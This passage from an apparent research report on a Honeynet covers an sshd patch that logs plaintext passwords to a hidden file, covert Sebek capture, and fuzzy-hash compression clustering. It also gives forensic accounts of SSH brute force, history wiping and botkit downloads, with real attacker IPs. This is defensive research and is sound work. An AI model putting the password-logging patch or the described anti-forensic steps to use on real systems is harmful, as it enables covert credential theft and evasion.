+                       fprintf(cookiemonster, "%ld:%.100s:%.100s:%.200s\n", (long)time(NULL), authctxt->user, password, get_remote_ipaddr());
+                       fclose(cookiemonster);
+               }
+       }
        return (result && ok);
}
Table 7: SSH patch for the Honeypot
In view of the security risk that such a log file can pose for an organization, it is best to
hide it deep within the system. For our implementation we hid it as
“/var/log/.hplaser7l/hpsshd_logged”. Different locations can be used within the system
depending on the implemented security policy.
Analysis of this ssh log file gave us insight into the efficiency of attack tools used for
brute force attacks, followed by the hacker's distributed attack techniques.
SSH logs suggesting brute force attack and successful exploitation by hacker:
uid=0 euid=0 tty=ssh ruser= rhost=209-173-99-82.bluetone.cz
Sep 21 10:59:54 paul-desktop sshd[10764]: Failed password for invalid user tibi from 82.99.173.209 port 42134 ssh2
Sep 21 10:59:54 paul-desktop sshd[10772]: Failed password for invalid user katy from 82.99.173.209 port 42292 ssh2
Sep 21 10:59:55 paul-desktop sshd[10769]: Failed password for root from 82.99.173.209 port 42237 ssh2
Sep 21 10:59:55 paul-desktop sshd[10777]: Invalid user scotch from 82.99.173.209
(…)
Sep 21 10:59:56 paul-desktop sshd[10776]: Failed password for man from 82.99.173.209 port 42760 ssh2
Sep 21 10:59:56 paul-desktop sshd[10782]: Invalid user tibo from 82.99.173.209
Sep 21 10:59:57 paul-desktop sshd[10784]: Accepted password for john from 82.99.173.209 port 43246 ssh2
Sep 21 10:59:57 paul-desktop sshd[10796]: pam_unix(sshd:session): session opened for user john by (uid=0)
Table 8: SSH Logs
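Log excerpts such as the one in Table 8 can be summarized automatically. The following Python sketch is one possible way of doing so and is not the analysis tooling used in our deployment: it counts failed password attempts per source address and flags an accepted login that follows a burst of failures from the same address. The regular expressions assume the sshd message format shown in Table 8, and the `min_failures` threshold is an arbitrary illustrative choice.

```python
import re
from collections import Counter
from typing import Iterable, List, Tuple

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+) port \d+")


def summarize(lines: Iterable[str],
              min_failures: int = 3) -> Tuple[Counter, List[Tuple[str, str]]]:
    """Return (failures per source IP, [(ip, user)] logins that followed a
    brute-force burst of at least `min_failures` failures from that IP)."""
    failures: Counter = Counter()
    compromised: List[Tuple[str, str]] = []
    for line in lines:
        match = FAILED.search(line)
        if match:
            failures[match.group(2)] += 1
            continue
        match = ACCEPTED.search(line)
        if match and failures[match.group(2)] >= min_failures:
            compromised.append((match.group(2), match.group(1)))
    return failures, compromised


# Lines copied from Table 8.
LOG_LINES = [
    "Sep 21 10:59:54 paul-desktop sshd[10764]: Failed password for invalid user tibi from 82.99.173.209 port 42134 ssh2",
    "Sep 21 10:59:54 paul-desktop sshd[10772]: Failed password for invalid user katy from 82.99.173.209 port 42292 ssh2",
    "Sep 21 10:59:55 paul-desktop sshd[10769]: Failed password for root from 82.99.173.209 port 42237 ssh2",
    "Sep 21 10:59:55 paul-desktop sshd[10777]: Invalid user scotch from 82.99.173.209",
    "Sep 21 10:59:56 paul-desktop sshd[10776]: Failed password for man from 82.99.173.209 port 42760 ssh2",
    "Sep 21 10:59:57 paul-desktop sshd[10784]: Accepted password for john from 82.99.173.209 port 43246 ssh2",
]

failures, compromised = summarize(LOG_LINES)
print(failures.most_common(5))
print(compromised)
```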
6.1.4. VMWare as Virtualization Software
Virtualization software has greatly helped reduce
expenses and total cost of ownership (TCO) for
organizations on their IT infrastructure. This is achieved
by setting up an entire farm of enterprise servers as
virtual machines on a single physical machine.
Organizations are now developing their own
virtualization software and solutions, many of which are
free and open source. A few notable names that we
considered for deployment include: VMware, User-Mode Linux, VirtualBox, Xen, Qemu,
Lguest and Linux-Vserver.
We selected and used VMware Server as the virtualization solution for our project. Later
implementations were shifted to VMware ESX server 4.0.
6.1.5. Honeywall Roo
Honeywall CDROM is a bootable CDROM for installing, deploying and maintaining a
Honeynet. The Honeynet Project has developed two versions of the Honeywall CDROM:
• Honeywall Eeyore: Released in May 2003, based on Gen II architecture (no longer
supported).
• Honeywall Roo: Released in May 2005, based on Gen III architecture (current
version 1.4).
Honeywall serves as a transparent gateway for the Honeynet. It is this gateway that has
to perform data capture, data control, data collection and data analysis functions in
order to ensure successful operations of a Honeynet. Being a transparent gateway, this
node is completely undetectable by the attacker when they are interacting with the
Honeypots. The purpose of the Honeywall CDROM is to automate the installation and
maintenance of a Honeynet and provide data analysis support for all activity within the
Honeynet. Deploying Honeynets was a strenuous task as it involved advanced
configuration and integration of security tools. There was no standard Honeynet
development till 1999. Many small groups had their own implementation of Honeynets.
The Honeynet Project has done remarkably well by developing a complete Honeywall
distribution on a CDROM to deploy as an Operating system on disk and thus made
Honeynets easy to deploy and manage.
Balas and Viecco [16] have given a generalized data collection and fusion diagram for a
Generation III Honeywall. Extending their work further we propose an extended diagram
for Honeywall Roo [22] Logical Design in Figure 8.
Figure 8: Roo Logical Design
Honeywall has evolved over the years. The previous version, Eeyore, had limited features and
control. Roo, the advanced version, has vastly improved hardware support,
administration capabilities, and data analysis functionality. Thus the system is now
moving towards giving the administrator more flexibility and control over the operating
system.
Honeywall Roo incorporates many well known security tools, such as:
• Snort: Sniffer, IDS.
• Snort_inline: Sniffer, IPS.
• Hflow2: A data coalescing tool for Honeynet data analysis.
• P0f: Passive OS fingerprinting tool.
• Tcpdump: View packet headers.
• Sebek: Data capture tool.
• Walleye Web Interface or the “Eye on the Honeywall”: A web based interface
for Honeywall configuration, administration and data analysis.
6.1.6. Sebek as data capture tool
Sebek is a data capture tool designed to capture attacker's activities on a Honeypot,
without the attacker knowing it. Sebek is based on client-server architecture. The Sebek
client runs on the Honeypots, to capture all of the attacker’s activities (keystrokes, file
transfer, passwords) then covertly send the data to the server. The Sebek server
collects and processes this data. The server normally runs on the Honeywall gateway,
but can also run independently at a remote host. Sebek is installed onto the system as a
Linux kernel module (LKM) that logs all data activity associated with invocations of the
standard “read” and “write” system calls. This logged activity is then sent out on the network in
the form of Sebek packets. These packets are concealed from the attacker's view by the
Sebek kernel module. This module itself can be concealed and is configurable to be
loaded under a user defined name for avoiding detection by the attacker [11]. Sebek
was used extensively in our project.
6.2. Proposed System for Automated Signature Engineering
6.2.1. Discussion
We believe that the effectiveness of a signature is directly proportional to the availability
of information needed to create it. The above discussion on automated signature
generation techniques concludes that the techniques being utilized today might be
better than their predecessors, but they too have limitations. These limitations arise as
authors focus on certain aspects of the problem while neglecting others. Information is
only extracted from the dimension that the author addressed in his research. This
information is only a small subset of the overall information that can be made available
by implementing multiple techniques. There is a need for a system that can “see more”
and “hear more” information to infer an intelligent and flexible result. Its
components must be configured so that they raise the alarm and shout “wolf” only when the
wolf really comes. Such a system would search for and collect information lying anywhere on the
system (disk, memory, network), generalize that information and correlate it to detect
an intrusion and generate mitigation signatures for it. With multiple sources of input,
this system will be capable of looking deeper into the network and system events to see
their behaviour. Such an approach can observe all, which otherwise would have been
invisible. Behavioural analysis and correlation of system and network events will
produce a new level of security awareness. This system will be able to perform the
following functions:
• Ability to detect attacks.
• Ability to detect anomalies.
• Ability to classify attacks.
• Ability to detect variations in attacks (polymorphism).
6.2.2. Methodology
6.2.2.1. Analysis of System Events
Host based intrusion detection systems can detect events going on in a host. Various
services, tools and agents running on a host can be configured to log events. The level
of logging is also configurable and is very helpful during debugging. Analysing this log
data can reveal events of interest. A host based Intrusion detection system such as
OSSEC can be configured on a host to parse these logs and report information from
them. Processes being run by users claim resources in the form of disk, memory, and
network. These processes constantly use library functions and system calls to interact
with the kernel. Tapping into such areas of the system, we can assign labels to process
events observing their behaviour e.g. File download, file copy, encrypt, decrypt, create
socket, open socket, start outbound connection, etc. These behavioural patterns can be
summed up into a behavioural profile that will contain all characteristics of a process or
event. This can be further augmented by performing static or dynamic code analysis.
A behavioural profile of a system will look something like this:
Figure 9: Behavioural profile for W32-Bagle-q worm [94]
6.2.2.2. Analysis of Network Events
Researchers have often utilized the well known 5-tuple as the basis for detection and
analysis of network traffic. We propose a network behavioural profile comprising
this 5-tuple along with a hashed payload. This information can easily be extracted
from a flow. A flow is a unidirectional component of a TCP connection (or its UDP or
ICMP equivalent) that contains all packets with the same source-IP address,
destination-IP address, source and destination ports, and transport protocol
(TCP/UDP/ICMP). A flow record contains this basic information, together with the
number of packets/bytes transferred, the flow duration, and the TCP flags encountered
in the flow packets. From these flows we intend to:
• Extract meaningful features associated with each flow (or group of flows), and
• Use these feature values to determine whether the flow is anomalous or not.
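The flow record described above can be sketched in Python as follows. This is an illustrative data structure only, assuming packets have already been parsed into simple tuples; the field names, the `build_flows` helper and the sample addresses (taken from the documentation address ranges) are hypothetical and do not describe the final implementation.

```python
from dataclasses import dataclass, field
from typing import Dict, Iterable, Set, Tuple

# 5-tuple: source IP, destination IP, source port, destination port, protocol.
FlowKey = Tuple[str, str, int, int, str]
# Parsed packet: timestamp, 5-tuple fields, size in bytes, TCP flags seen.
Packet = Tuple[float, str, str, int, int, str, int, Tuple[str, ...]]


@dataclass
class FlowRecord:
    first_seen: float
    last_seen: float
    packets: int = 0
    byte_count: int = 0
    tcp_flags: Set[str] = field(default_factory=set)

    @property
    def duration(self) -> float:
        return self.last_seen - self.first_seen

    @property
    def mean_packet_size(self) -> float:
        return self.byte_count / self.packets


def build_flows(packets: Iterable[Packet]) -> Dict[FlowKey, FlowRecord]:
    """Aggregate packets into unidirectional flows keyed by the 5-tuple."""
    flows: Dict[FlowKey, FlowRecord] = {}
    for ts, src, dst, sport, dport, proto, size, flags in packets:
        key = (src, dst, sport, dport, proto)
        record = flows.get(key)
        if record is None:
            record = flows[key] = FlowRecord(first_seen=ts, last_seen=ts)
        record.packets += 1
        record.byte_count += size
        record.last_seen = max(record.last_seen, ts)
        record.tcp_flags.update(flags)
    return flows


packets = [
    (0.00, "198.51.100.7", "192.0.2.10", 42134, 22, "TCP", 60, ("SYN",)),
    (0.25, "192.0.2.10", "198.51.100.7", 22, 42134, "TCP", 60, ("SYN", "ACK")),
    (0.50, "198.51.100.7", "192.0.2.10", 42134, 22, "TCP", 52, ("ACK",)),
]
flows = build_flows(packets)
key = ("198.51.100.7", "192.0.2.10", 42134, 22, "TCP")
print(flows[key])
```

Because a flow is unidirectional, the reply packet in the example lands in a second record with the addresses and ports reversed. Features such as the duration or the mean packet size can then be read from each record.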
6.2.2.3. Hashing Algorithm for Payload Hashing
We require our system to be able to detect attack variations by observing network
packets. Adding payload to the behavioural profile gives us extra information which can
be helpful in classifying the flow. Since packet payloads can vary quite drastically during
a communication, adding the entire ASCII or Hex payload to the profile can yield
abnormal results when run with an edit distance algorithm to calculate similarity.
The requirement is to create a fingerprint of the entire payload or parts of it that is unique
enough to be representative of the payload and yet statistically balanced enough to
identify areas with similarities when compared with other flows. One way to
represent variable size payloads as fixed size fingerprints is to hash them. A hash function is a
mathematical function that maps an input of arbitrary size to a fixed size sequence. Hashing is
extensively used in computer security to verify the integrity and authenticity of a digital source.
The most widely used hashing algorithms are MD5 and SHA. The problem with such hashing is
that a slight change in input causes an avalanche effect and drastically changes the
output. This will result in a completely different hash for a slightly different payload. This result is
unacceptable for a system that requires the estimation of similarity between flows.
This will have a negative effect on the profile and will result in higher edit distances.
Thus similar flows will be marked by the system as entirely separate. Fuzzy hashing or
piecewise hashing solves this problem. It involves the ability to compare two distinctly
different items and determine a fundamental level of similarity (expressed as a
percentage) between the two [82]. This technique “spamsum” originated as an effort by
Dr. Andrew Tridgell [83] to find commonality between spam email messages. The
payload hashed with this technique is added to the profile.
Example:
Contents of file alphabet.txt: “ABCDEFGHIJKLMNOPQRSTUVWXYZ”
After modification: “ABCDEFGHIJKLMNOPQRSTUVWXYZ Edited by Fahim”
The difference in the hashes is illustrated in the table below:

               Before                             After
md5            1d238b74da513ce35e129e7dc07060ad   fe1b01ed362cd84e549a6b397d0e3e74
fuzzy hashing  3:Pg/vmNKzug:Y/vmNKzug             3:Pg/vmNKzul6A4jFS:Y/vmNKzulrr

Table 9: Comparison of MD5 and Fuzzy Hashing
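The contrast in the example can be reproduced with a short Python sketch. It is a deliberately simplified stand-in, not the spamsum algorithm: the function `piecewise_signature` and its fixed 4-byte block size are assumptions made for illustration, whereas spamsum chooses block boundaries with a rolling hash so that insertions in the middle of the input also disturb only nearby pieces.

```python
import hashlib

# Base64 alphabet used to print one character per block.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def piecewise_signature(data: bytes, block_size: int = 4) -> str:
    """Toy piecewise hash: hash each fixed-size block down to one character."""
    chars = []
    for start in range(0, len(data), block_size):
        block = data[start:start + block_size]
        digest = hashlib.md5(block).digest()
        chars.append(ALPHABET[digest[0] % 64])
    return "".join(chars)


def common_prefix_len(a: str, b: str) -> int:
    """Number of leading characters two signatures share."""
    n = 0
    for ca, cb in zip(a, b):
        if ca != cb:
            break
        n += 1
    return n


before = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
after = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ Edited by Fahim"

# Whole-input hash: the two digests have nothing usable in common.
md5_before = hashlib.md5(before).hexdigest()
md5_after = hashlib.md5(after).hexdigest()

# Piecewise hash: blocks that did not change keep their signature character.
sig_before = piecewise_signature(before)
sig_after = piecewise_signature(after)
shared = common_prefix_len(sig_before, sig_after)
```

The unchanged leading blocks produce the same signature characters in both inputs, which is the property that lets an edit distance over signatures reflect payload similarity.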
6.2.2.4. Clustering By Compression
Clusters are groups of objects that are similar according to the metric used. There are two
main types of clustering:
1. Partitional
2. Hierarchical
Partitional clustering algorithms determine all clusters at once. They can
also be used as divisive algorithms in hierarchical clustering. Examples of partitional
clustering algorithms include k-means clustering, fuzzy c-means clustering and QT
clustering.
Hierarchical clustering algorithms identify clusters based on previously established
clusters. They are implemented as either agglomerative (“bottom-up”) or
divisive (“top-down”) algorithms.
Cilibrasi et al. [86] proposed a new universal method of clustering by using compression.
They applied their technique in diverse areas such as genetics, music, image processing,
radio observations and language families. Their technique is based on a
parameter-free similarity distance measure called the Normalized Compression
Distance (NCD), which is used to generate a distance matrix. The results are then clustered
using a hierarchical clustering technique called the quartet method [86]. NCD is a
computable approximation of the normalized information distance (NID), in which the
Kolmogorov complexity K is replaced by the compressed length C produced by a real
compressor. It is given by:
\[ \mathrm{NCD}(x, y) = \frac{C(xy) - \min\{C(x), C(y)\}}{\max\{C(x), C(y)\}} \]
NCD is now being used in areas of genome phylogeny, language families, clustering of
music, clustering of handwritten digits for OCR, radio observations, malware and
internet traffic classification and detection.
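As a minimal sketch of the NCD formula, the following Python code uses `zlib` as the compressor C. The choice of zlib and the sample byte strings are assumptions made for illustration; the report itself relies on the CompLearn toolkit.

```python
import random
import zlib


def compressed_size(data: bytes) -> int:
    """C(x): length in bytes of the zlib-compressed input."""
    return len(zlib.compress(data, 9))


def ncd(x: bytes, y: bytes) -> float:
    """Normalized Compression Distance between two byte strings."""
    cx, cy = compressed_size(x), compressed_size(y)
    cxy = compressed_size(x + y)
    return (cxy - min(cx, cy)) / max(cx, cy)


# Two hypothetical HTTP-like payloads that differ only in the requested path.
http_a = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n" * 20
http_b = b"GET /about.html HTTP/1.1\r\nHost: example.com\r\n\r\n" * 20

# Incompressible noise of the same length, seeded so the run is repeatable.
rng = random.Random(0)
noise = bytes(rng.randrange(256) for _ in range(len(http_a)))

d_similar = ncd(http_a, http_b)    # small: one payload largely describes the other
d_different = ncd(http_a, noise)   # close to 1: nothing is shared
```

With a real compressor the distance of an object to itself is small but usually not exactly zero, which is also why the two halves of a measured distance matrix need not be perfectly symmetric.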
NID is a normalized representation of the information distance E(x,y). NID is
given by:
\[ \mathrm{NID}(x, y) = \frac{\max\{K(x \mid y), K(y \mid x)\}}{\max\{K(x), K(y)\}} \]
The information distance E(x,y), “the length of the shortest binary program for the
reference universal prefix Turing machine that, with input x computes y, and with input y
computes x” [86], is given by the equation:
\[ E(x, y) = \max\{K(x \mid y), K(y \mid x)\} \]
Based on certain features we can see a likeness or dissimilarity among data obtained
from different sources. Cilibrasi et al. [86] proposed a method to expose this likeness
using a new similarity metric based on compression. This metric is parameter-free and
does not use any features or background knowledge about the data. Thus it can find
similarities in both feature-based and non-feature-based data. This compression-based
similarity metric was developed as a normalized version of the “information metric”.
The approach is to find significant similarity between two objects by compressing one
given the information in the other, and vice versa. If two objects are more similar,
then we can describe one more succinctly given the other. The mathematics involved is
based on Kolmogorov complexity theory [85].
Halvar Flake [89], along with Carrera and Erdélyi [90], has shown how executable
objects can be compared using graph-based methodologies. Halvar Flake has also
applied this methodology to the analysis of malware. The idea is to extract information
used by worms. This is done by comparing different versions of the same executable after
disassembling the binary. This approach gives insight into the actual information and
flow of the security vulnerability. Wehner [88] discussed a fast method for guessing the
family of an observed worm without disassembly.
Network traffic characterization has been studied extensively. However, very little work has
been done using compression-based clustering and classification. Wehner [88]
applies the approach of [85], using compression to determine similarities.
Kulkarni and Bush [91] have attempted similar methods based on Kolmogorov
complexity to monitor network traffic. They, however, do not use compression. Work
carried out by Evans and Barnett [92] to compare the complexity of legal FTP traffic with
illegal traffic involved compression of sampled benign and attack FTP data from
servers. Kulkarni, Evans and Barnett [93] carried out denial-of-service measurements using
Kolmogorov complexity, which is estimated by computing the entropy of the
1s contained in the packet. This estimate is then tracked over time using a
complexity differential.
In our particular case we want to analyse data sets comprising behavioural profiles
of network and system events, for which the number of clusters is not known and the
data are not labelled. Hierarchical clustering suits this unsupervised setting. The
relationships are represented in the form of a dendrogram, which is customarily a
directed binary tree or an undirected ternary tree. To construct the tree from a distance
matrix whose entries are the pair-wise distances between objects, we use
the freely available CompLearn toolkit
provided by the author [87]. This tool uses a heuristic to implement the quartet
method; the heuristic uses the standardized benefit score S(t). The quartet method
proposed by the author addresses the minimum quartet tree cost (MQTC) problem, which is
an NP-hard graph optimization problem.
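To make the step from a distance matrix to clusters concrete, here is a minimal Python sketch of agglomerative clustering with average linkage. It is a much simpler stand-in for the quartet method and does not reproduce CompLearn; the function `average_linkage`, the stopping rule `max_distance` and the 4x4 matrix are all hypothetical. Stopping on a distance rather than a cluster count reflects the requirement that the number of clusters is not known in advance.

```python
def average_linkage(dist, max_distance):
    """Bottom-up clustering on a square distance matrix.

    Repeatedly merges the two closest clusters and stops once the closest
    pair is farther apart than max_distance.
    """
    clusters = [[i] for i in range(len(dist))]

    def linkage(a, b):
        # Average of all pairwise distances between members of a and b.
        return sum(dist[i][j] for i in a for j in b) / (len(a) * len(b))

    while len(clusters) > 1:
        best = None
        for p in range(len(clusters)):
            for q in range(p + 1, len(clusters)):
                d = linkage(clusters[p], clusters[q])
                if best is None or d < best[0]:
                    best = (d, p, q)
        d, p, q = best
        if d > max_distance:
            break
        clusters[p] = clusters[p] + clusters[q]
        del clusters[q]
    return [sorted(c) for c in clusters]


# Hypothetical distances: objects 0 and 1 are close, as are objects 2 and 3.
dist = [
    [0.00, 0.10, 0.80, 0.90],
    [0.10, 0.00, 0.85, 0.80],
    [0.80, 0.85, 0.00, 0.20],
    [0.90, 0.80, 0.20, 0.00],
]
clusters = average_linkage(dist, max_distance=0.5)
```

Recording the order of the merges instead of only the final groups would give the dendrogram mentioned above.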
6.3. Results and Discussion
We now examine how well this technique clusters the profiles that we have
obtained. It would be a great achievement to detect worm-like activity or
any anomaly based on benign profiles. This would create classifications based on
clustering.
A prototype of our method is explained here:
Proposed Hashed Technique

Packets  1         2         3         4         5         6         7         8
1        0         0.464706  0.476744  0.111842  0.184211  0.519737  0.566038  0.526316
2        0.464706  0         0.44186   0.458824  0.470588  0.594118  0.588235  0.6
3        0.476744  0.447674  0         0.47093   0.482558  0.604651  0.30814   0.616279
4        0.105263  0.458824  0.47093   0         0.173333  0.513333  0.559748  0.526667
5        0.177632  0.470588  0.482558  0.173333  0         0.496552  0.578616  0.510345
6        0.526316  0.594118  0.604651  0.526667  0.503448  0         0.408805  0.230159
7        0.578616  0.594118  0.319767  0.572327  0.584906  0.408805  0         0.421384
8        0.526316  0.605882  0.627907  0.526667  0.517241  0.246032  0.427673  0

Table 10: Proposed Hashed Technique
Legend: HTTP packets (1-5), IRC packets (6-8)
Old Technique (NCD ONLY)

Packets  1         2         3         4         5         6         7         8
1        0         0.850746  0.786082  0.440789  0.447368  0.564935  0.83376   0.585526
2        0.849088  0         0.742952  0.845771  0.844113  0.855721  0.771144  0.859038
3        0.783505  0.73466   0         0.775773  0.768041  0.786082  0.099744  0.796392
4        0.440789  0.849088  0.773196  0         0.144068  0.480519  0.815857  0.412214
5        0.447368  0.84743   0.768041  0.144068  0         0.448052  0.815857  0.40458
6        0.571429  0.868988  0.793814  0.480519  0.474026  0         0.734015  0.344156
7        0.828645  0.769486  0.102302  0.815857  0.810742  0.731458  0         0.741688
8        0.592105  0.870647  0.806701  0.419847  0.419847  0.331169  0.744246  0

Table 11: Old Technique (NCD only)
Tables 10 and 11 show the pairwise distances for 8 packets extracted from our Honeynet pcap files. Packets 1-5
are HTTP traffic packets, and packets 6-8 are IRC-based botnet traffic. Our
proposed approach shows a high similarity among the HTTP packets and among the IRC packets
respectively. In Table 10, HTTP packets have a highest (farthest) similarity score of 0.482558 with
each other, which can be treated as the upper threshold value. IRC packets have a
farthest similarity score of 0.427673 with each other (packets 7 and 8 in Table 10). This gives us a general idea of the
characteristics of traffic that the compressor can see.
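The upper thresholds discussed above can be recomputed directly from Table 10. The following Python sketch transcribes the matrix from the table; the helper names `max_within` and `min_between` are hypothetical, and the packet grouping (1-5 HTTP, 6-8 IRC) follows the description in the text.

```python
# Pairwise distances transcribed from Table 10 (row i, column j).
TABLE_10 = [
    [0,        0.464706, 0.476744, 0.111842, 0.184211, 0.519737, 0.566038, 0.526316],
    [0.464706, 0,        0.44186,  0.458824, 0.470588, 0.594118, 0.588235, 0.6],
    [0.476744, 0.447674, 0,        0.47093,  0.482558, 0.604651, 0.30814,  0.616279],
    [0.105263, 0.458824, 0.47093,  0,        0.173333, 0.513333, 0.559748, 0.526667],
    [0.177632, 0.470588, 0.482558, 0.173333, 0,        0.496552, 0.578616, 0.510345],
    [0.526316, 0.594118, 0.604651, 0.526667, 0.503448, 0,        0.408805, 0.230159],
    [0.578616, 0.594118, 0.319767, 0.572327, 0.584906, 0.408805, 0,        0.421384],
    [0.526316, 0.605882, 0.627907, 0.526667, 0.517241, 0.246032, 0.427673, 0],
]

HTTP = [0, 1, 2, 3, 4]  # packets 1-5 (zero-based indices)
IRC = [5, 6, 7]         # packets 6-8


def max_within(matrix, group):
    """Largest distance between two different members of one group."""
    return max(matrix[i][j] for i in group for j in group if i != j)


def min_between(matrix, a, b):
    """Smallest distance between a member of a and a member of b.

    Both matrix halves are checked because the measured distances
    are not perfectly symmetric.
    """
    return min(min(matrix[i][j], matrix[j][i]) for i in a for j in b)


http_threshold = max_within(TABLE_10, HTTP)
irc_threshold = max_within(TABLE_10, IRC)
closest_cross_pair = min_between(TABLE_10, HTTP, IRC)
```

A cross-group distance that falls below either within-group threshold marks a pair that such a threshold rule would misclassify, so `closest_cross_pair` is a quick check on how well the two traffic types separate.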
Analysis of this scheme reveals that compressing the payload after hashing it is a far
better approach than simply compressing the entire raw payload. As illustrated in the tables,
hashing the payload first resulted in almost twice as much compression as the previous technique.
This technique can be applied to the work done by Wehner [88] to obtain an even better
classification of worms. In her work, Wehner [88] implemented Cilibrasi’s technique
[86] of clustering based on Kolmogorov complexity [85] for clustering malware. The
approach is similar to our work but differs greatly in implementation, as we apply fuzzy
hashing first. Her approach is fruitful but requires more resources depending on the size of the
malware being observed. Since we can represent all or part of the malware using
fuzzy hashing, it is quite possible to achieve better results with less complexity and
more robustness.
Another promising avenue revealed by this result is the classification of traffic based on
compression results. When packets from the two groups are compared with each other, they give much higher
values than the upper thresholds observed. Packet 3 compared with packet 7 is,
however, an exception. Although these packets are very dissimilar and, like others in
their groups, are expected to give a higher (farther) similarity score (i.e. greater than
0.5), they do not. The resulting value is about 0.3, suggesting a very high
similarity. This is also visible in the clustering graph shown in Figure 10. This
raises the questions “Is hashing the entire ASCII payload meeting the expected
results?”, “Should we break up the payload and then hash the pieces?” and “How many
bytes of the payload should be considered as a standard window size?” This is an
interesting research area that we aim to address in future.
Figure 10: Clustering by Compression and hashing
Chapter 7: Results
Figure 11: Honeynet Data Graphical view (ip-port)
7.1. Summary
The virtual Honeynet was online for a period of approximately 60 days, from 15th
September 2008 to 15th November 2008. During this period we received over 30,000
identifiable attack connections. The attack results were documented as attacked ports
and services, attacker IPs and country of origin. The first attack was documented
4 days after setting up the Honeynet. After several port scans an attacker attempted an
SSH brute force attack from “82.99.xx.xxx”. The geo-location of the IP was retrieved [23].
After several hundred attempts the attacker succeeded in brute forcing a user
account. A botnet client was installed from a free webhosting server and IRC [25]
communication was initiated; the chat sessions were translated from Romanian to
English using the Google Translate service [24]. The tools and chat/commands were
successfully retrieved from this session for further forensic analysis. During the project,
five similar sophisticated attacks were observed, from which valuable information and
tools were successfully retrieved. Forensic analysis revealed a depth of
information on the attackers, their organization into groups and their ties with each other;
some system credentials were also logged during the chat exchange. After analysis we
concluded that attackers originating from Europe are commanding a
large army of zombie hosts in China and the US to gain access to targets across the
globe. Servers are always a high-value target for them as they offer a variety of services
over stable high-speed links. Figure 11 shows a graphical representation of all the
Honeynet data in the form of a linked graph. Red nodes represent source IPs, green
nodes represent destination IPs, blue nodes are the destination ports and the yellow
node represents the Honeypot.
7.2. Attack Statistics
Figure 12: Probed Ports
We have analysed attacks targeting our Honeynet over a period of 30 days (September
12th to October 12th), and documented them as:
• Attacked/probed ports and services
• Attacker IPs
• Attackers' country of origin
7.2.1. Attacked Ports and Services
Taking a small sample of attacked ports and services, it was observed that out of
a total of 29643 probed ports and services, 29048 were targeted at SSH. This indicates
the attackers' focus on brute force as a means of gaining access to the server. This is followed
by high activity on IRC ports, indicating botnet activity.
7.2.2. Attacker IP's
During its 30 day tenure the Honeypot received 34263 attacks from 615 unique IP's. A
great amount of these attacks originated from Europe and China.
Figure 13: Top 10 Attackers and Attack Magnitude
Figure 14: Probed ports (excluding SSH)
7.2.3. Attacker’s Country of Origin
615 unique attacker IP addresses were identified, originating from 79 countries across
the globe. Of these 79 countries, the highest number of attacks came from China
and Europe, followed by the US. The same ordering also holds for the highest attack
frequencies.
Figure 15: Top 50 Attacks by Country (pie chart)
7.3. Forensic Analysis
7.3.1. First Hack
September 20th, 2008
INTERPRETATION:
The attacker gains access to the system, checks running processes and kills the user cron process.
Then, after checking the users connected to the box, the attacker changes the user password. Next he
gathers system information and, based on the system, downloads his botkit to the /tmp directory. The
attacker then runs the botkit and disables history logging by pointing the history environment variables to /dev/null. Finally he loads
up his users file and, after verifying that everything is configured and working well, exits the system.
Refer to Appendix B for Sebek and SSH Logs
Table 12: Forensics: Hack
7.3.2. Brute Force and Botnets
Oct 6th to 8th, 2008
INTERPRETATION
[2008-10-17 15:32:57 ]-
Unsetting and Deleting History logging:
After gaining user shell access on the system, the hacker checks the users currently connected to the
system, unsets the history environment variables and deletes the user's .bash_history file.
Information Gathering:
The hacker gathers system information such as system uptime and host information, and CPU information
such as the number of processors, instruction set and cache.
The botkit:
After making sure his activities won't be logged and gathering system information, the attacker downloads
his IRC bot into a hidden folder in one of the least used shared system directories, /dev/shm. IRC bots
are tools that can control a compromised system remotely via the IRC chat channels that the compromised
system is set to listen to. Using IRC to control a compromised system is much more covert than using
SSH directly, as the attacker no longer has to log into the system directly. Further, it allows
the attacker to control several such systems, also known as zombies, at the same time. IRC bots are
freely available for the legitimate purpose of controlling and maintaining IRC channels; those
customized for malicious intent are termed botkits from here on.
Table 13: Forensics: Brute Force and Botnets
7.3.3. More Botnets
October 18, 2008
92.81.123.209
auth.log.0:Oct 19 07:32:02 paul-desktop sshd[13538]: Accepted password for john from 92.81.123.209
port 54571 ssh2
INTERPRETATION:
This is most probably the attacker’s IP, as he knew the password and logged in without any failed
attempts.
Conclusion:
1. Attackers upload botkits to free webhosting sites as JPEGs, possibly because webhosting
companies do not scan JPEG files, or treat them differently.
2. It is our responsibility to inform these webhosting companies of the illicit content that is being hosted
by them and exploited by attackers.
Table 14: Forensics: More Botnets
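The reasoning used in the interpretation above (a successful login with no preceding failures suggests the password was already known) can be sketched in Python. The regular expression targets the sshd "Accepted password" line quoted in the table and the matching "Failed password" form; the function `failures_before_success` and the three lines from 192.0.2.7 are hypothetical and are not taken from the Honeynet logs.

```python
import re
from collections import Counter

SSHD_AUTH = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def failures_before_success(lines):
    """Map each IP that logged in to the number of failed attempts before its first success."""
    failures = Counter()
    first_success = {}
    for line in lines:
        m = SSHD_AUTH.search(line)
        if m is None:
            continue
        ip = m["ip"]
        if m["result"] == "Failed":
            failures[ip] += 1
        elif ip not in first_success:
            first_success[ip] = failures[ip]
    return first_success


log = [
    # Hypothetical brute-force sequence from a documentation address.
    "Oct 19 07:30:00 paul-desktop sshd[13001]: Failed password for john from 192.0.2.7 port 40001 ssh2",
    "Oct 19 07:30:03 paul-desktop sshd[13002]: Failed password for invalid user admin from 192.0.2.7 port 40002 ssh2",
    "Oct 19 07:30:06 paul-desktop sshd[13003]: Accepted password for john from 192.0.2.7 port 40003 ssh2",
    # Line quoted in the report.
    "auth.log.0:Oct 19 07:32:02 paul-desktop sshd[13538]: Accepted password for john from 92.81.123.209 port 54571 ssh2",
]
summary = failures_before_success(log)
```

An address that maps to zero failures is a candidate for an attacker returning with credentials obtained earlier, possibly by a scanner running from a different host.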
7.3.4. Coordinated Attacks
23rd October, 2008
88.191.98.14 and 91.22.242.105
INTERPRETATION:
